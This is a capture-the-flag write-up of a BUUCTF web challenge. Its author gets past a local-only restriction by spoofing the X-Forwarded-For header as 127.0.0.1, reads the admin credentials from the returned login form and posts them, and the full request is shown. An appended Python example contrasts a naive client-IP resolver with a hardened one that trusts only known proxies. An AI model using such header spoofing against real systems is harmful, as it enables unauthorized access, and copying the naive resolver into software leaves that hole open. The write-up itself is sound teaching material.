BUU BURP COURSE 1
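Walking beginners into the mysterious HTTP protocol - 超超boy - 部落格園
A detailed introduction to HTTP header fields - 超超boy - 部落格園
After starting the target machine, I found that it can only be accessed locally, so I captured the request with Burp Suite (bp) and edited the request headers. After some trial and error, adding X-Forwarded-For:127.0.0.1
gave me access. The response was the following HTML: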
<!DOCTYPE html>
<html lang="zh-cn">
<head>
<meta charset="UTF-8">
<title>登入</title>
</head>
<body>
<div style="text-align: center">
<form action="" method="post">
使用者名稱:<input type="text" name="username" value="admin"/><br>
密碼:<input type="password" name="password" value="wwoj2wio2jw93ey43eiuwdjnewkndjlwe"/><br>
<input type="submit" value="登入"/>
</form>
</div>
</body>
</html>
Logging in with the given username and password using the POST method is all that is needed.
POST / HTTP/1.1
Host: 1994e278-3628-4701-a30c-79ce5314c08d.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
X-Forwarded-For:127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe
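
Why the X-Forwarded-For header above was enough to pass the local-only check, and how a server can resolve the client address without trusting it blindly. This is an added example, not code from the challenge or the original post; the trusted proxy address 10.0.0.5, the sample requests and all function names are assumptions.

```python
import ipaddress

# Assumption: the only reverse proxy allowed to set X-Forwarded-For (constructed value).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]

def _is_trusted(ip):
    return any(ip in net for net in TRUSTED_PROXIES)

def client_ip_naive(peer_ip, headers):
    """Weak: believes whatever the client put in X-Forwarded-For."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip

def client_ip_hardened(peer_ip, headers):
    """Use the TCP peer address; consult X-Forwarded-For only when the peer
    is a trusted proxy, walking right to left past trusted hops."""
    peer = ipaddress.ip_address(peer_ip)
    if not _is_trusted(peer):
        return str(peer)
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed entry: fall back to the peer address
        if not _is_trusted(ip):
            return str(ip)
    return str(peer)

def is_local(ip):
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False

def allowed(resolver, peer_ip, headers):
    """Local-only access check using the given address resolver."""
    return is_local(resolver(peer_ip, headers))

if __name__ == "__main__":
    # Constructed requests: (TCP peer address, request headers)
    spoofed = ("203.0.113.7", {"X-Forwarded-For": "127.0.0.1"})
    via_proxy = ("10.0.0.5", {"X-Forwarded-For": "127.0.0.1, 203.0.113.7"})
    real_local = ("127.0.0.1", {})
    for name, req in [("spoofed", spoofed), ("via_proxy", via_proxy), ("real_local", real_local)]:
        print(name, allowed(client_ip_naive, *req), allowed(client_ip_hardened, *req))
```

The hardened resolver assumes the trusted proxy appends the address it saw to the right of any X-Forwarded-For value the client sent, which is why the list is read from right to left.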